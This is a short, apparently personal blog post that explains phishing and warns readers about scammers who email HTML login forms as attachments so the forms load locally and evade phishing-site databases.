Phishing is the practice of sending fake emails, claiming to be from a bank, credit card company, or some other such organization that has personal information.
These emails usually claim that your account has been limited, or information needs to be updated, or some other reason that you need to go log into the site and correct the problem.
The email then contains a link taking you to the site purportedly belonging to the organization, which is, in fact, a site owned by the scammer. Your information, credit card details, bank username and password, or other private information is then given to the scammer, if you fill out the form and click the submit button.
To combat this activity, security industry players have created databases of known phishing sites, such as http://www.phishtank.com, which web browsers and security software can use to verify sites that you visit. These databases have a method to submit new phishing sites, which I have done myself, which are then checked and verified by other users, and in turn used to warn visitors to the phishing site that it is not legitimate.
As with anything in the security industry, though, this is a game of oneupmanship. To bypass the online databases of phishing sites, the phishers are now using a new tactic, which I've noticed a couple of times in the past month. Undoubtedly, this method will grow in popularity, due to the difficulty of controlling it.
What the phishers are now doing, instead of emailing a link to a fake online login form, is to email the entire form itself. The form shows as an attachment to an email, which, when clicked, opens in your web browser, just the same as a regular phishing site. What is different, though, is instead of being loaded from http://www.phishers.com/FakePayPalLogin/, enabling your browser's phishing protection to warn you, it's loaded directly from your own computer.
A local file, loaded from your own computer, is assumed to be safe. In fact, a local file has to be assumed safe, or various components of Windows would break, due to the way Microsoft has chosen to integrate these components.
The form is a pure HTML document, like a web page, which simply directs the form data to a malicious server, set up to harvest data from victims. In one case, I've seen it encoded using Javascript to be difficult to analyze.
At this point, I can't think of a way to handle this. The only real way to find dangerous files on your own computer is through antivirus and antispyware software. But since the form is simply an HTML web page, with no dangerous content, it's very difficult, if not impossible, for antivirus software to detect.
It will be interesting to see what the security industry comes up with to combat this, and I'll be working on the problem myself, also. In the meantime, keep an eye out for such attachments supposedly coming from these types of sites.